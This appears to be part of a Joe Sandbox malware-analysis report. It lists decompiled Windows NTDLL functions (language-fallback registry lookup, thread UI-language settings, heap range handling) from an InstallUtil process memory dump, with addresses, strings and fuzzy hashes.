					E0130FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0130BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01309600();
					if(_t97 < 0) {
						goto L6;
					}
					E0130BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L012CF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0130BB40(_t83, _t102 + 0x24, _t78);
								if(L012D43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0130BB40(_t84, _t102 + 0x24, _t94);
									if(L012D43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x012ce620
0x012ce628
0x012ce62f
0x012ce631
0x012ce635
0x012ce637
0x012ce63e
0x01325503
0x01325503
0x012ce64c
0x012ce64c
0x012ce651
0x00000000
0x00000000
0x012ce661
0x012ce665
0x0132542a
0x012ce715
0x012ce71a
0x012ce71c
0x012ce720
0x012ce720
0x012ce727
0x012ce736
0x012ce736
0x012ce743
0x012ce743
0x012ce673
0x012ce678
0x012ce67d
0x012ce682
0x012ce685
0x012ce692
0x012ce69b
0x012ce6a3
0x012ce6ad
0x012ce6b1
0x012ce6b2
0x012ce6bb
0x012ce6bf
0x012ce6c0
0x012ce6c8
0x012ce6cc
0x012ce6d5
0x012ce6d9
0x00000000
0x00000000
0x012ce6e5
0x012ce6ea
0x012ce6f9
0x012ce70b
0x012ce70f
0x01325439
0x0132545e
0x0132545e
0x00000000
0x0132545e
0x0132543b
0x0132543e
0x01325440
0x01325445
0x01325472
0x01325475
0x0132548d
0x01325493
0x013254a9
0x00000000
0x00000000
0x013254ab
0x013254b4
0x013254bc
0x013254c8
0x013254de
0x013254fb
0x013254e0
0x013254e6
0x013254eb
0x013254eb
0x013254de
0x00000000
0x013254bc
0x01325477
0x0132547a
0x01325480
0x01325483
0x01325486
0x0132548b
0x00000000
0x00000000
0x00000000
0x0132548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01325447
0x01325447
0x01325447
0x01325447
0x0132544e
0x00000000
0x00000000
0x01325450
0x01325452
0x01325455
0x0132545a
0x00000000
0x00000000
0x00000000
0x0132545c
0x0132546a
0x0132546d
0x0132546f
0x00000000
0x0132546f
0x012ce70f

Strings

@, xrefs: 012CE6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 012CE68C
InstallLanguageFallback, xrefs: 012CE6DB

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: bdf51ea5f90f2008ee12c4f33d0807c42c62386dc9ef36bad96574bd4eefbebd
Instruction ID: 6d661fdf2bac1c1bf22de02c3b1b7348bf8a8483d9a9c172e2b78b666691c99f
Opcode Fuzzy Hash: bdf51ea5f90f2008ee12c4f33d0807c42c62386dc9ef36bad96574bd4eefbebd
Instruction Fuzzy Hash: 1951E7765143569BD715EF28C840ABBB7E8BF88618F05092EFA85E7240F734DA04C792

Uniqueness

Uniqueness Score: -1.00%

Function 0135FF10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0135FF9A

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0135FF60

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: DebugPrintTimes
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 3446177414-1911121157
Opcode ID: b325dc2d0fc4e68944212bc7a7d24175b6b544ebcceb220af2e02e23ed443ca2
Instruction ID: 25fd731dad0387685315aecb229341043b4cab031b98e6856db2800b60ecb4fd
Opcode Fuzzy Hash: b325dc2d0fc4e68944212bc7a7d24175b6b544ebcceb220af2e02e23ed443ca2
Instruction Fuzzy Hash: 9B112671550144EFDF66DF58C988F98BBB5FF05B08F148058FA0857AA1C7389944CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012FFAB0 Relevance: 2.8, Strings: 2, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E012FFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E012DEEF0(0x13b7b60);
					_t134 =  *0x13b7b84; // 0x77577b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x13b7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x13b7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E012D6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E012D76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01368938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E012CB150();
													}
													_t116 = E01366D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E012D75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x13b8638; // 0x0
																	_t122 = L012D38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E012D76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E012D76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L012FFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L012D70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E012FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E012FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E012FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E012FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E012FFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x13b7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x13b7b84 = _t75;
						_t73 = E012DEB70(_t134, 0x13b7b60);
						if( *0x13b7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E012DFF60( *0x13b7b20);
							}
						}
						goto L5;
					}
				}
			}

0x012ffab0
0x012ffab2
0x012ffab3
0x012ffab4
0x012ffabc
0x012ffac0
0x012ffb14
0x012ffb17
0x012ffac2
0x012ffac8
0x012ffacd
0x012ffad3
0x012ffad3
0x012ffadd
0x012ffb18
0x012ffb1b
0x012ffb1d
0x012ffb1e
0x012ffb1f
0x012ffb20
0x012ffb21
0x012ffb22
0x012ffb23
0x012ffb24
0x012ffb25
0x012ffb26
0x012ffb27
0x012ffb28
0x012ffb29
0x012ffb2a
0x012ffb2b
0x012ffb2c
0x012ffb2d
0x012ffb2e
0x012ffb2f
0x012ffb3a
0x012ffb3b
0x012ffb3e
0x012ffb41
0x012ffb44
0x012ffb47
0x012ffb4a
0x012ffb4d
0x012ffb53
0x0133bdcb
0x0133bdcb
0x012ffb59
0x012ffb5b
0x012ffb5b
0x012ffb5e
0x0133bdd5
0x0133bdd8
0x00000000
0x0133bdda
0x00000000
0x0133bdda
0x012ffb64
0x012ffb64
0x012ffb64
0x012ffb67
0x012ffb6e
0x012ffb70
0x012ffb72
0x00000000
0x012ffb78
0x012ffb7a
0x012ffb7a
0x012ffb7d
0x012ffb80
0x0133bddf
0x0133bde1
0x00000000
0x0133bde3
0x00000000
0x0133bde3
0x012ffb86
0x012ffb86
0x012ffb86
0x012ffb8b
0x012ffb90
0x012ffb92
0x012ffb94
0x012ffb9a
0x012ffb9b
0x012ffba1
0x0133bde8
0x0133bdeb
0x0133bded
0x0133beb5
0x0133beb5
0x0133bebb
0x0133bebd
0x0133bec3
0x0133bed2
0x0133bedd
0x0133bedd
0x0133beed
0x00000000
0x0133bdf3
0x0133bdfe
0x0133be06
0x0133be0b
0x0133be0d
0x0133be0f
0x0133be14
0x0133be19
0x0133be20
0x0133be25
0x0133be27
0x0133be35
0x0133be39
0x0133be46
0x0133be4f
0x0133be54
0x0133be56
0x0133bef8
0x0133bef8
0x00000000
0x0133be5c
0x0133be5c
0x0133be60
0x00000000
0x0133be66
0x0133be66
0x0133be7f
0x0133be84
0x0133be87
0x0133be89
0x0133be8b
0x0133be99
0x0133be9d
0x0133bea0
0x0133beac
0x0133beaf
0x0133beb1
0x0133beb3
0x0133beb3
0x00000000
0x0133bea2
0x0133bea2
0x00000000
0x0133bea2
0x0133be8d
0x0133be8d
0x0133be92
0x00000000
0x0133be92
0x0133be8b
0x0133be60
0x0133be3b
0x0133be3b
0x0133be3e
0x00000000
0x0133be40
0x0133be40
0x0133be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0133be44
0x0133be3e
0x0133be29
0x0133be29
0x00000000
0x0133be29
0x0133be27
0x00000000
0x012ffba7
0x012ffba7
0x012ffbab
0x0133bf02
0x012ffbb1
0x012ffbb1
0x012ffbb8
0x012ffbbd
0x012ffbbd
0x012ffbbf
0x012ffbbf
0x012ffbc5
0x012ffbcb
0x012ffbf8
0x012ffbf8
0x012ffbfa
0x00000000
0x012ffc00
0x012ffc00
0x012ffc03
0x00000000
0x012ffc09
0x012ffc09
0x012ffc0f
0x012ffc15
0x012ffc23
0x012ffc23
0x012ffc25
0x012ffc27
0x012ffc75
0x012ffc7c
0x012ffc84
0x00000000
0x012ffc29
0x012ffc29
0x012ffc2d
0x012ffc30
0x0133bf0f
0x00000000
0x012ffc36
0x012ffc38
0x012ffc3b
0x012ffc41
0x0133bf17
0x0133bf19
0x0133bf48
0x0133bf4b
0x00000000
0x0133bf1b
0x0133bf22
0x0133bf24
0x0133bf26
0x00000000
0x0133bf2c
0x0133bf37
0x0133bf39
0x0133bf3b
0x00000000
0x0133bf41
0x0133bf41
0x0133bf41
0x0133bf41
0x0133bf45
0x00000000
0x0133bf45
0x0133bf3b
0x0133bf26
0x00000000
0x012ffc47
0x012ffc47
0x012ffc49
0x012ffcb2
0x012ffcb4
0x012ffcb6
0x012ffcdc
0x012ffcdc
0x00000000
0x012ffcb8
0x012ffcc3
0x012ffcc5
0x012ffcc7
0x00000000
0x012ffcc9
0x012ffcc9
0x012ffccd
0x00000000
0x012ffccd
0x012ffcc7
0x00000000
0x012ffc4b
0x012ffc4b
0x012ffc4e
0x012ffc4e
0x012ffc51
0x012ffc51
0x012ffc54
0x012ffc5a
0x012ffc5c
0x012ffc5f
0x012ffc61
0x012ffc63
0x012ffc65
0x012ffc67
0x012ffc6e
0x012ffc72
0x012ffc72
0x012ffc72
0x012ffc72
0x012ffc67
0x012ffc61
0x00000000
0x012ffc5a
0x012ffc49
0x012ffc41
0x012ffc30
0x012ffc27
0x012ffc03
0x012ffbcd
0x012ffbd3
0x012ffbd9
0x012ffbdc
0x012ffbde
0x012ffc99
0x012ffc9b
0x012ffc9d
0x012ffcd5
0x012ffcd5
0x012ffc89
0x012ffc89
0x00000000
0x012ffc9f
0x012ffc9f
0x012ffca3
0x00000000
0x012ffca3
0x00000000
0x012ffbe4
0x012ffbe4
0x012ffbe4
0x012ffbe4
0x012ffbe9
0x012ffbf2
0x00000000
0x012ffbf2
0x012ffbde
0x012ffbcb
0x012ffbab
0x012ffc8b
0x012ffc8b
0x012ffc8c
0x012ffb80
0x012ffb72
0x012ffb5e
0x012ffc8d
0x012ffc91
0x012ffadf
0x012ffadf
0x012ffae1
0x012ffae4
0x012ffae7
0x012ffaec
0x012ffaf8
0x012ffb00
0x012ffb07
0x012ffb0f
0x012ffb0f
0x012ffb07
0x00000000
0x012ffaf8
0x012ffadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0133BE0F
1, xrefs: 012FFAF1

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!$1
API String ID: 0-464699016
Opcode ID: d725692eaaf748019d6587c5a822b3d2403343c6a4b6e6f6544a1386e5f30b6f
Instruction ID: cc48afb8e6f4adba6078d5cd3620f267142639f26746fd9da5d57fa5fc340ba5
Opcode Fuzzy Hash: d725692eaaf748019d6587c5a822b3d2403343c6a4b6e6f6544a1386e5f30b6f
Instruction Fuzzy Hash: A9A11372B206168BEB25CF6CC590B7AF7A4AF88714F04457DEB06CB694EB74D841CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0138E539 Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0138E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0138BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0138BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0138AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01309730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0138A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0138A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01309730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0138A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0138A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E012E2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E012DB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E012DFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E012E7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0137FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0138e547
0x0138e549
0x0138e54f
0x0138e553
0x0138e557
0x0138e55a
0x0138e55c
0x0138e55f
0x0138e561
0x0138e567
0x0138e56b
0x0138e7e2
0x00000000
0x0138e571
0x0138e575
0x0138e577
0x0138e57b
0x0138e57c
0x0138e57d
0x0138e57e
0x0138e57f
0x0138e588
0x0138e58f
0x0138e591
0x0138e592
0x0138e592
0x0138e596
0x0138e59e
0x0138e5a0
0x0138e5a6
0x0138e61d
0x0138e61d
0x0138e621
0x0138e623
0x0138e630
0x0138e630
0x0138e7e6
0x0138e7eb
0x0138e7ed
0x0138e7f4
0x0138e7fa
0x0138e7ff
0x0138e7ff
0x0138e80a
0x0138e812
0x0138e812
0x0138e5ab
0x0138e5b4
0x0138e5b9
0x0138e5be
0x0138e5c0
0x0138e5c2
0x0138e5c8
0x0138e5c9
0x0138e5cb
0x0138e5cc
0x0138e5d5
0x0138e5e4
0x0138e5f1
0x0138e5f8
0x0138e5f8
0x0138e5d5
0x0138e602
0x0138e616
0x0138e63d
0x0138e644
0x0138e64d
0x0138e652
0x0138e657
0x0138e659
0x0138e65b
0x0138e661
0x0138e662
0x0138e664
0x0138e665
0x0138e66e
0x0138e67d
0x0138e68a
0x0138e691
0x0138e691
0x0138e66e
0x0138e6b0
0x00000000
0x0138e6b6
0x0138e6bd
0x0138e6c7
0x0138e6d7
0x0138e6d9
0x0138e6db
0x0138e6de
0x0138e6e3
0x0138e6f3
0x0138e6fc
0x0138e700
0x0138e700
0x0138e704
0x0138e70a
0x0138e70a
0x0138e713
0x0138e716
0x0138e719
0x0138e720
0x0138e761
0x0138e76b
0x0138e774
0x0138e77a
0x0138e77a
0x0138e78a
0x0138e791
0x0138e799
0x0138e79b
0x0138e79f
0x0138e7aa
0x0138e7c0
0x0138e7ac
0x0138e7b2
0x0138e7b9
0x0138e7b9
0x0138e7c7
0x0138e806
0x00000000
0x0138e7c9
0x0138e7d1
0x0138e7d8
0x00000000
0x0138e7d8
0x00000000
0x00000000
0x0138e722
0x0138e72e
0x0138e748
0x0138e74c
0x0138e754
0x0138e756
0x0138e75c
0x0138e75c
0x00000000
0x0138e75c
0x0138e758
0x0138e758
0x00000000
0x0138e758
0x0138e750
0x00000000
